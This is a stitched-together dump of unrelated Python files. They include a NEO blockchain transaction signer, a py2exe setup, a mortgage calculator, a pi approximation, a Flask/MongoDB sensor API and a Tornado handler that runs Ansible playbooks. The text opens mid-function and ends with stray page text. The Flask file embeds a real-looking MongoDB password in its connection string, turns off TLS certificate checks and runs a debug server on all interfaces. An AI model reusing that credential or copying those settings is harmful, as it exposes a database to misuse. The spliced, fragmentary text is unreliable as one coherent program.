        # Restore the backup if the download failed for whatever reason.
        # BUG FIX: the original restored to cwd + "modlunky2.exe" (missing the
        # "/" separator), writing the backup to a mangled sibling path instead
        # of restoring the executable.
        copyfile(backup_path, exe_path)
        print("Download Failed.")
if __name__ == "__main__":
    main()
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Crypto related wrapper functions."""
import logging
import pyswitcheo.crypto_utils as cutils
from neocore.Cryptography.Crypto import Crypto
from pyswitcheo.datatypes.fixed8 import Fixed8
from pyswitcheo.datatypes.transaction_types import (
TransactionInput,
TransactionOutput,
TransactionAttribute,
Witness,
)
logger = logging.getLogger(__name__)
MAX_TRANSACTION_ATTRIBUTE_SIZE = 65535
def serialize_transaction_output(output):
    """Serialize a TransactionOutput to its hex wire format.

    A TransactionOutput has three params:
        1. assetId (Uint256)
        2. value: value of the output (Fixed8)
        3. scriptHash (Uint160)

    Args:
        output (TransactionOutput): TransactionOutput which needs to be serialized.

    Returns:
        (str) serialized version of TransactionOutput.
    """
    asset_hex = cutils.reverse_hex(output.assetId)
    value_hex = Fixed8(output.value).to_reverse_hex()
    script_hex = cutils.reverse_hex(output.scriptHash)
    return asset_hex + value_hex + script_hex
def serialize_transaction_input(input):
    """Serialize a TransactionInput to its hex wire format.

    A TransactionInput has two params:
        1. prevHash: transaction hash (Uint256)
        2. prevIndex: index of the coin in the previous transaction (Uint16)

    Args:
        input (TransactionInput): TransactionInput which needs to be serialized.

    Returns:
        (str) serialized version of TransactionInput.
    """
    logger.debug("serialize_transaction_input")
    prev_hash_hex = cutils.reverse_hex(input.prevHash)
    prev_index_hex = cutils.reverse_hex(cutils.num_to_hex_string(input.prevIndex, 2))
    logger.debug(prev_hash_hex)
    logger.debug(prev_index_hex)
    return prev_hash_hex + prev_index_hex
def serialize_claim_exclusive(transaction=None):
    """Serialize the claim-transaction-specific fields (type 0x02). Not implemented.

    The dispatch table in serialize_exclusive() calls every exclusive
    serializer with the transaction as a positional argument, so the original
    zero-argument signature raised TypeError when reached and otherwise
    silently returned None; accepting an optional ``transaction`` and failing
    explicitly makes the gap visible.

    Raises:
        NotImplementedError: always.
    """
    raise NotImplementedError("claim transaction serialization is not implemented")
def serialize_contract_exclusive(transaction=None):
    """Serialize the contract-transaction-specific fields (type 0x80). Not implemented.

    The dispatch table in serialize_exclusive() calls every exclusive
    serializer with the transaction as a positional argument, so the original
    zero-argument signature raised TypeError when reached and otherwise
    silently returned None; accepting an optional ``transaction`` and failing
    explicitly makes the gap visible.

    Raises:
        NotImplementedError: always.
    """
    raise NotImplementedError("contract transaction serialization is not implemented")
def serialize_invocation_exclusive(transaction):
    """Serialize the invocation-transaction-specific fields (type 0xd1).

    Emits the script length as a var-int (hex length / 2, i.e. bytes), the
    script itself, and — from version 1 onward — the gas as a Fixed8.

    Args:
        transaction (dict): invocation transaction with "type", "script",
            "version" and (for version >= 1) "gas" keys.

    Returns:
        (str) the serialized exclusive data.

    Raises:
        TypeError: if the transaction type is not 0xd1.
    """
    if transaction["type"] != 0xd1:
        raise TypeError("TransactionInvocation type should be 0xd1.")
    script = transaction["script"]
    parts = [cutils.num_to_var_int(int(len(script) / 2)), script]
    if transaction["version"] >= 1:
        parts.append(str(Fixed8.num_to_fixed_8(transaction["gas"])))
    return "".join(parts)
def serialize_exclusive(transaction_type):
    """Look up the exclusive-data serializer for a transaction type.

    Args:
        transaction_type (int): 2 (claim), 128 (contract) or 209 (invocation).

    Returns:
        The serializer function registered for that type.

    Raises:
        KeyError: for an unsupported transaction type.
    """
    dispatch = {
        2: serialize_claim_exclusive,
        128: serialize_contract_exclusive,
        209: serialize_invocation_exclusive,
    }
    return dispatch[transaction_type]
def serialize_witness(witness):
    """Serialize a Witness to its hex wire format.

    A Witness has two params, both little-endian hex strings stored as-is,
    each preceded by its byte length as a var-int:
        1. invocationScript
        2. verificationScript

    Args:
        witness (Witness): witness which needs to be serialized.

    Returns:
        (str) serialized version of the witness.

    NOTE(review): len(...) / 2 is float division under Python 3 — confirm
    cutils.num_to_var_int accepts a float, otherwise this should use // 2.
    """
    parts = [
        cutils.num_to_var_int(len(witness.invocationScript) / 2),
        witness.invocationScript,
        cutils.num_to_var_int(len(witness.verificationScript) / 2),
        witness.verificationScript,
    ]
    return "".join(parts)
def sign_transaction(transaction, priv_key):
    """Sign a transaction object with the user's private key.

    Args:
        transaction (json): dictionary object returned after creating a transaction.
        priv_key (bytes): private key to be used to sign this.

    Returns:
        A signed transaction string.
    """
    unsigned_hex = serialize_transaction(tx=transaction, signed=False)
    return sign_msg(unsigned_hex, priv_key)
def sign_msg(msg, priv_key):
    """Sign a given message using a private key.

    Args:
        msg (str): message which needs to be signed.
        priv_key (bytes): private key to be used to sign this.

    Returns:
        The hex-encoded signature.
    """
    signature = Crypto.Sign(msg, priv_key)
    return signature.hex()
def serialize_transaction_attribute(attr):
    """Serialize a TransactionAttribute to its hex wire format.

    Emits the usage byte, then (for some usages) a length prefix, then the
    attribute data.

    Args:
        attr (TransactionAttribute): attribute with ``usage`` (int) and
            ``data`` (hex str) fields.

    Returns:
        (str) serialized attribute.

    Raises:
        Exception: if the data exceeds MAX_TRANSACTION_ATTRIBUTE_SIZE.
    """
    attr_len = len(attr.data)
    if attr_len > MAX_TRANSACTION_ATTRIBUTE_SIZE:
        raise Exception(
            "Attribute data size is beyond max attribute size {0}".format(
                MAX_TRANSACTION_ATTRIBUTE_SIZE
            )
        )
    out = cutils.num_to_hex_string(attr.usage)
    # NOTE(review): attr_len / 2 (byte length of the hex data) is float
    # division under Python 3 — confirm the cutils helpers accept floats,
    # otherwise these should use // 2.
    if attr.usage == 0x81:
        # Single-byte length prefix for usage 0x81.
        out += cutils.num_to_hex_string(attr_len / 2)
    elif attr.usage == 0x90 or attr.usage >= 0xf0:
        # Var-int length prefix for usage 0x90 and the >= 0xf0 range.
        out += cutils.num_to_var_int(attr_len / 2)
    if (attr.usage == 0x02) or (attr.usage == 0x03):
        # For usages 0x02/0x03 only 64 hex chars of the data, skipping the
        # first byte, are emitted — presumably a fixed 32-byte payload whose
        # leading byte is implied by the usage; verify against the protocol.
        out += attr.data[2:64]
    else:
        out += attr.data
    return out
def serialize_transaction(tx, signed=True):
    """Serialize a transaction object to its hex wire format.

    Emits, in order: type byte, version byte, the type-specific exclusive
    data, then the attributes, inputs and outputs (each list preceded by its
    var-int length), and — when ``signed`` — the witness scripts.

    Args:
        tx (dict): transaction as returned by the REST API ("type", "version",
            "attributes", "inputs", "outputs", "scripts", ...).
        signed (bool): include the witness scripts when True.

    Returns:
        (str) the serialized transaction.
    """
    tx_out = tx["outputs"]
    tx_ins = tx["inputs"]
    tx_scripts = tx["scripts"]
    out = ""
    out += cutils.num_to_hex_string(tx["type"])
    out += cutils.num_to_hex_string(tx["version"])
    # Type-specific payload (claim / contract / invocation dispatch).
    out += (serialize_exclusive(tx["type"]))(tx)
    out += cutils.num_to_var_int(len(tx["attributes"]))
    for attribute in tx["attributes"]:
        attr = TransactionAttribute(**attribute)
        out += serialize_transaction_attribute(attr)
    out += cutils.num_to_var_int(len(tx_ins))
    for tx_in in tx_ins:
        inp = TransactionInput(**tx_in)
        out += serialize_transaction_input(inp)
    out += cutils.num_to_var_int(len(tx_out))
    for output in tx_out:
        outp = TransactionOutput(**output)
        out += serialize_transaction_output(outp)
    if signed and tx_scripts and (len(tx_scripts) > 0):
        out += cutils.num_to_var_int(len(tx_scripts))
        for script in tx_scripts:
            witness = Witness(**script)
            out += serialize_witness(witness)
    logger.debug("Final serialized transaction message to sign {0}".format(out))
    # NOTE(review): .strip() on a hex string should be a no-op; confirm it is
    # purely defensive and not masking stray whitespace from a helper.
    return out.strip()
def sign_array(input_arr, priv_key):
    """Sign each item in an input array.

    Args:
        input_arr (dict): input array of transaction objects; each element is a
            dictionary with "id" and "txn" keys.
        priv_key (bytes): private key to be used to sign each transaction.

    Returns:
        A dictionary of signed objects, keyed by the id of each element.
    """
    return {item["id"]: sign_transaction(item["txn"], priv_key) for item in input_arr}
|
__version__ = '0.0.1'
__author__ = 'czh'
from .main import TPTool
from .main import normalThread
from .webDriverPool import ChromeDriverHelper
from .threadGuiHelper import threadGuiHelper
|
#coding=utf-8
'''
py2exe build script: packages main.py as a windowed (no-console) Windows exe.

Created on 2013-09-22
@author: hongkangzy
'''
from distutils.core import setup
import py2exe
# MSVCP90.dll is excluded from the bundle — commonly done because the MSVC
# runtime must be present on (or installed to) the target system rather than
# shipped with the exe; NOTE(review) confirm the target machines have it.
setup(
    options = {
        "py2exe": {
            "dll_excludes": ["MSVCP90.dll"],
        }
    },windows=[{"script": "main.py"}])
|
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# Author: Hongying_Lee
# @Time: 2020/5/4
# @Name: findTheDifference
def findTheDifference(s, t):
    """Return the one character of ``t`` that is not accounted for by ``s``.

    ``t`` is expected to be ``s`` (in any order) with exactly one extra
    character appended; that extra character is returned.  Replaces the two
    hand-rolled frequency dicts of the original with collections.Counter.

    Args:
        s (str): original string.
        t (str): ``s`` shuffled, with one character added.

    Returns:
        (str) the added character, or None when ``t`` matches ``s`` exactly
        (same as the original's fall-through behavior).
    """
    from collections import Counter
    # Counter subtraction keeps only the characters t has in surplus over s.
    surplus = Counter(t) - Counter(s)
    for ch, count in surplus.items():
        if count > 0:
            return ch
if __name__ == '__main__':
    print(findTheDifference("aaa", "aaab"))
|
from model.amortization_schedule import AmortizationSchedule
from model.monthly_details import MonthlyDetails
class Calculator:
    """Mortgage calculation class. Calculates the monthly payment, interest, etc."""

    def __init__(self):
        # NOTE(review): last_value is never read anywhere in this class; kept
        # only for backward compatibility with any external users.
        self.last_value = 0

    @staticmethod
    def convert_rate_to_monthly(rate):
        """Convert the rate from an annual percentage to a monthly fraction."""
        return rate / 12 / 100

    @staticmethod
    def convert_term_to_monthly(term):
        """Convert the term of the mortgage from number of years to number of months."""
        return term * 12

    @staticmethod
    def calculate_monthly_payment(principal, rate, term):
        """Calculate the fixed monthly payment for a given mortgage.

        Standard annuity formula: P * r / (1 - (1 + r)^-n), with r the monthly
        rate and n the number of monthly payments.

        :param principal: the amount borrowed
        :param rate: annual interest rate, in percent
        :param term: the term of the mortgage, in years
        :return: the monthly payment amount
        """
        monthly_rate = Calculator.convert_rate_to_monthly(rate)
        monthly_term = Calculator.convert_term_to_monthly(term)
        if monthly_rate == 0:
            # BUG FIX: a 0% mortgage made the annuity formula divide by zero
            # (1 - (1 + 0)^-n == 0); with no interest the payment is simply
            # the principal spread evenly over the term.
            return principal / monthly_term
        return (monthly_rate * principal) / (1 - ((1 + monthly_rate) ** (-1 * monthly_term)))

    @staticmethod
    def calculate_monthly_interest(principal_balance, rate):
        """Calculate one month's interest on the outstanding principal balance."""
        monthly_rate = Calculator.convert_rate_to_monthly(rate)
        return principal_balance * monthly_rate

    @staticmethod
    def calculate_mortgage_metrics(amortization_schedule, totals):
        """Calculate the metrics for a given amortization schedule.

        :param amortization_schedule: the amortization schedule that has details of the
            monthly payments of a mortgage
        :param totals: the totals calculated for the payment, interest, etc. that are
            used to calculate the metrics
        :return: the amortization schedule with the metric values filled in
        """
        metrics = {
            # Interest as a percentage of everything paid.
            'Interest': totals['interest'] / totals['payments'] * 100,
            # Interest as a percentage of the principal borrowed.
            'InterestOverPrincipal': totals['interest'] / totals['principal'] * 100,
        }
        amortization_schedule.totals = totals
        amortization_schedule.metrics = metrics
        return amortization_schedule

    @staticmethod
    def is_time_to_make_early_payment(current_month, early_payment_frequency):
        """Return True when an early payment falls due this month.

        A frequency of 0 means early payments are disabled.
        """
        if early_payment_frequency == 0:
            return False
        return current_month % early_payment_frequency == 0

    @staticmethod
    def calculate_schedule(principal, rate, term, early_payment=0, early_payment_frequency=0):
        """Calculate the amortization schedule of a mortgage.

        :param principal: the principal borrowed
        :param rate: the annual rate of interest of the mortgage, in percent
        :param term: the term of the mortgage in years
        :param early_payment: optional extra principal payment amount
        :param early_payment_frequency: make the early payment every N months (0 = never)
        :return: the completed amortization schedule with totals and metrics
        """
        monthly_payment = round(Calculator.calculate_monthly_payment(principal, rate, term), 2)
        principal_balance = principal
        current_month = 1
        amortization_schedule = AmortizationSchedule()
        totals = amortization_schedule.totals
        while principal_balance > 0:
            if Calculator.is_time_to_make_early_payment(current_month, early_payment_frequency):
                totals['early'] += early_payment
                principal_balance -= early_payment
            # Calculate the monthly principal and interest.
            monthly_interest = round(Calculator.calculate_monthly_interest(principal_balance,
                                                                           rate), 2)
            if principal_balance > monthly_payment:
                monthly_principal = round((monthly_payment - monthly_interest), 2)
                principal_balance = round((principal_balance - monthly_principal), 2)
            else:
                # This is typically for the last month, when the balance is
                # less than the monthly payment: the remaining balance is paid
                # off in full and no interest is charged (original behavior,
                # preserved).
                monthly_interest = 0
                monthly_principal = principal_balance
                principal_balance = 0
                monthly_payment = monthly_principal
            # Add to the running totals.
            totals['payments'] += monthly_payment
            totals['interest'] += monthly_interest
            totals['principal'] += monthly_principal
            monthly_details = MonthlyDetails(current_month,
                                             monthly_payment,
                                             monthly_principal,
                                             monthly_interest,
                                             principal_balance,
                                             round(totals['interest'], 2),
                                             round(totals['principal'], 2),
                                             round(totals['payments'], 2)
                                             )
            # Store the monthly payment in the amortization schedule.
            amortization_schedule.payment_schedule.append(monthly_details)
            current_month += 1
        return Calculator.calculate_mortgage_metrics(amortization_schedule, totals)
|
# Calculates pi using the Gregory-Leibniz series:
#   pi = 4/1 - 4/3 + 4/5 - 4/7 + ...
from math import *
from random import *
iterations = 10000
divisor = 1.0
switch = False  # alternates the sign of each successive term
pie = 4 / divisor  # first term: 4/1
for x in range(0, iterations):
    divisor += 2
    if switch:
        pie += 4 / divisor
        switch = False
    else:
        pie -= 4 / divisor
        switch = True
print(pie)
# BUG FIX: a bare `print` is a no-op expression under Python 3 (the Python-2
# idiom printed a blank line); print() restores the blank lines.
print()
print(pi)  # math.pi, for comparison with the approximation
print()
|
from flask import Flask, jsonify, request
import pymongo
from flask_cors import CORS
from os import environ
from bson.json_util import dumps
import json
app = Flask(__name__)
# SECURITY(review): a live MongoDB username/password is hard-coded in this
# connection string, and ssl_cert_reqs=CERT_NONE disables certificate
# verification. Move the URI into an environment variable and rotate the
# credential.
client = pymongo.MongoClient("mongodb+srv://root:0NqePorN2WDm7xYc@cluster0.fvp4p.mongodb.net/iot?retryWrites=true&w=majority&ssl=true&ssl_cert_reqs=CERT_NONE")
CORS(app)  # enable cross-origin requests for all routes
# NOTE(review): db and db1 point at the same database; kept as-is.
db = client['fsr_rfid']
collection = db['collection']
db1 = client['fsr_rfid']
tray_in_data = db1["tray_in_updated"]
@app.route("/rfid_fsr", methods=['GET'])
def rfid_fsr():
    """Return, per date, the number of FSR/RFID events in each hourly slot.

    Response: JSON mapping "YYYY-M-D" -> {"04:00": count, ..., "23:00": count}.
    """
    # Template of hourly buckets copied for every new date.
    hour_template = {'04:00': 0, '05:00': 0, '06:00': 0, '07:00': 0, '08:00': 0,
                     '09:00': 0, '10:00': 0, '11:00': 0, '12:00': 0, '13:00': 0,
                     '14:00': 0, '15:00': 0, '16:00': 0, '17:00': 0, '18:00': 0,
                     '19:00': 0, '20:00': 0, '21:00': 0, '22:00': 0, '23:00': 0}
    dict_info = {}
    for single_data in collection.find():
        timestamp = str(single_data["timestamp"])
        date_part, time_part = timestamp.split(" ")[0], timestamp.split(" ")[1]
        # Strip a leading zero from the day so keys look like "2021-01-5".
        parts = date_part.split("-")
        day = parts[2][1:] if parts[2][0] == "0" else parts[2]
        date = "{}-{}-{}".format(parts[0], parts[1], day)
        hour_key = time_part[:2] + ":00"
        if date not in dict_info:
            dict_info[date] = dict(hour_template)
        # BUG FIX: the original wrote the first event of each new date into an
        # unused local dict (list_data) instead of dict_info, so the first
        # reading of every day was dropped from the response.
        # NOTE(review): timestamps outside 04:00-23:59 raise KeyError here, as
        # they did in the original.
        dict_info[date][hour_key] += 1
    return json.dumps(dict_info), 200
@app.route("/tray_in", methods=["GET"])
def tray_in():
    """Return, per date, the summed tray-in status_count for each hourly slot.

    Response: JSON mapping "YYYY-M-D" -> {"04:00": total, ..., "23:00": total}.
    """
    # Template of hourly buckets copied for every new date.
    hour_template = {'04:00': 0, '05:00': 0, '06:00': 0, '07:00': 0, '08:00': 0,
                     '09:00': 0, '10:00': 0, '11:00': 0, '12:00': 0, '13:00': 0,
                     '14:00': 0, '15:00': 0, '16:00': 0, '17:00': 0, '18:00': 0,
                     '19:00': 0, '20:00': 0, '21:00': 0, '22:00': 0, '23:00': 0}
    dict_info = {}
    for single_data in tray_in_data.find():
        status_count = single_data["status_count"]
        timestamp = str(single_data["timestamp"])
        date_part, time_part = timestamp.split(" ")[0], timestamp.split(" ")[1]
        # Strip a leading zero from the day so keys look like "2021-01-5".
        parts = date_part.split("-")
        day = parts[2][1:] if parts[2][0] == "0" else parts[2]
        date = "{}-{}-{}".format(parts[0], parts[1], day)
        hour_key = time_part[:2] + ":00"
        if date not in dict_info:
            dict_info[date] = dict(hour_template)
        # BUG FIX: the original wrote the first record of each new date into an
        # unused local dict (list_data) instead of dict_info, dropping that
        # record's status_count from the response.
        # NOTE(review): timestamps outside 04:00-23:59 raise KeyError here, as
        # they did in the original.
        dict_info[date][hour_key] += status_count
    return json.dumps(dict_info), 200
@app.route("/tray_in_out", methods=['GET'])
def tray_in_out():
    """Return totals: trays returned by cleaners vs. returned by users themselves.

    SelfReturn is derived as (all recorded returns) - (cleaner returns).
    """
    # NOTE(review): Cursor.count() was removed in pymongo 4; on modern drivers
    # this needs collection.count_documents({}) — confirm the pinned pymongo
    # version.
    total_out = collection.find().count()
    trolley_in = tray_in_data.find()
    total = 0
    for data1 in trolley_in:
        total += data1['status_count']
    self_in = total_out - total
    data = {"CleanerReturn": total, "SelfReturn": self_in}
    return json.dumps(data), 200
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5008, debug=True)
from tornado.web import RequestHandler, asynchronous
from tornado.gen import coroutine
from tornado.concurrent import run_on_executor
from concurrent.futures import ThreadPoolExecutor
from tornado.httpclient import AsyncHTTPClient
import requests
import json
import os
from base.ansible_api import ANSRunner
import logging.config
import time
from base import TargetStatus
from base.resource_config import inventory_data
from base.configuration import LOG_SETTINGS
publish_base_dir = '/home/admin/eju_publish'
logging.config.dictConfig(LOG_SETTINGS)
logger = logging.getLogger('module_action')
class ModuleUpdateHandler(RequestHandler):
    """Tornado handler that runs an Ansible playbook to update a module on a
    set of hosts, then optionally POSTs the per-host results to a callback URL.
    """
    # Thread pool used by @run_on_executor so the blocking Ansible run and the
    # callback HTTP POST do not block the IOLoop.
    executor = ThreadPoolExecutor(8)
    playbooks_dir = os.path.join(publish_base_dir, 'playbooks')

    @asynchronous
    @coroutine
    def post(self):
        """Handle a module-update job request (JSON body)."""
        logger.info("receive module update post")
        body = self.request.body.decode()
        body = json.loads(body)
        logger.info("post body: {}".format(body))
        # Parse request parameters.
        # NOTE(review): content defaults to '' (a str) when missing, so the
        # .get calls below would raise AttributeError — confirm callers always
        # send a "content" object.
        content = body.get('content', '')
        environment = content.get('environment', '')
        project = content.get('project', '')
        module = content.get('module', '')
        hosts = body.get('hosts')
        parameters = body.get('parameters')
        version_info = body.get('version_info', '')
        version = version_info['version']
        build = version_info['build']
        file_list = version_info['file_list']
        host_list = []
        for host in hosts:
            host_dict = dict()
            host_dict["hostname"] = host['host']
            host_list.append(host_dict)
        # Ansible inventory: one "default" group carrying the target hosts and
        # the variables the playbook needs.
        resource = {
            "default": {
                "hosts": host_list,
                "vars": {
                    "env": environment,
                    "project": project,
                    "module": module,
                    "version": version,
                    "build": build,
                    "file_list": file_list
                }
            },
        }
        jobid = body.get('jobid', '')
        task_id = body.get('taskid', '')
        jobname = body.get('jobname', '')
        task_callback_url = body.get('callback', '')
        playbook_name = jobname + '.yml'
        if not environment or not project or not module or not host_list or not resource:
            self.write('argument is null')
            logger.info('argument is null')
            self.finish()
        else:
            hostlist = []
            for host in hosts:
                hostlist.append(host['host'])
            extra_vars = {
                "host": hostlist
            }
            # Runs on the thread pool; the coroutine yields until it finishes.
            result_data = yield self.run_ansible(resource, extra_vars, environment, project, module, playbook_name)
            logger.info("run ansible result data: {}".format(result_data))
            if task_callback_url:
                # Overall status: fail as soon as any host failed or was
                # unreachable.
                status = TargetStatus.success.value
                messages = result_data.get('status', '')
                for host_status in messages.values():
                    if host_status['unreachable'] > 0 or host_status['failed'] > 0:
                        status = TargetStatus.fail.value
                call_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
                # Build one per-host message with its ok/failed/unreachable
                # task lines and a per-host status (1 = ok, 2 = failed).
                callback_messages = []
                for host in messages.keys():
                    callback_message = dict()
                    callback_message['host'] = host
                    callback_message['message'] = dict()
                    callback_message['message']['success'] = []
                    for msg in result_data.get('ok').get(host, []):
                        call_msg = "{},{},{},{}".format(call_time, jobname, msg['task'], 'success')
                        callback_message['message']['success'].append(call_msg)
                    callback_message['message']['failed'] = []
                    for msg in result_data.get('failed').get(host, []):
                        call_msg = "{},{},{},{}".format(call_time, jobname, msg['task'], 'failed')
                        callback_message['message']['failed'].append(call_msg)
                    callback_message['message']['unreachable'] = []
                    for msg in result_data.get('unreachable').get(host, []):
                        call_msg = "{},{},{},{}".format(call_time, jobname, msg['task'], 'unreachable')
                        callback_message['message']['unreachable'].append(call_msg)
                    if messages[host]['failed'] > 0 or messages[host]['unreachable'] > 0:
                        callback_message['status'] = 2
                    else:
                        callback_message['status'] = 1
                    callback_messages.append(callback_message)
                # Blocking call (runs on the executor; the coroutine waits).
                yield self.callback(task_callback_url, jobid, task_id, jobname, status, callback_messages)
            if result_data:
                # This path is blocking and always reports success; an async
                # queue should be added later.
                """
                **Response Syntax**
                ```
                Content-Type: application/json
                {
                "jobid":"",
                "hosts" : [{"host":"10.99.70.51"},{"host":"10.99.70.52"}],
                "jobname" : "demo",
                "content":{"bu":"","group":"","model":""},
                "parameters" : [{"k1":"v1"},{"k2":"v3"},{"k3":"v3"}],
                "callback":"url"
                "status":"" // 1:参数接收成功,2:参数接收失败
                }
                """
                response_data = {
                    "jobid": jobid,
                    "taskid": task_id,
                    "status": 1
                }
                self.write(response_data)
                self.finish()
            else:
                logger.info('do not need callback')
                response_data = {
                    "jobid": jobid,
                    "taskid": task_id,
                    "status": 1,
                    "message": result_data
                }
                self.write(response_data)
                self.finish()

    @run_on_executor
    def run_ansible(self, resource, extra_vars, environment, project, module, playbook_name):
        """Run the module's playbook on the thread pool; returns the parsed
        playbook result dict."""
        playbook_path = os.path.join(self.playbooks_dir, environment, project, module, playbook_name)
        logger.info('playbook_name:{}'.format(playbook_path))
        ansible_runner = ANSRunner(resource, environment, project, module)
        ansible_runner.run_playbook(extra_vars=extra_vars,playbook_path=playbook_path)
        result_data = ansible_runner.get_playbook_result()
        return json.loads(result_data)

    @run_on_executor
    def callback(self, callback_url, jobid, task_id, jobname, status, messages):
        """POST the job result to the caller's callback URL (on the thread
        pool); returns True when the remote side acknowledges with status 1."""
        payload = {
            "jobid": jobid,
            "taskid": task_id,
            "jobname": jobname,
            "status": status,
            "messages": messages
        }
        logger.info("module action callback: payload={}".format(payload))
        res = requests.post(callback_url, json=payload)
        if res.status_code == requests.codes.ok:
            context = res.json()
            logger.info("callback success:{}".format(context))
            if context['status'] == 1:
                return True
            else:
                return False
        else:
            logger.error("callback fail: {}".format(payload))
            return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.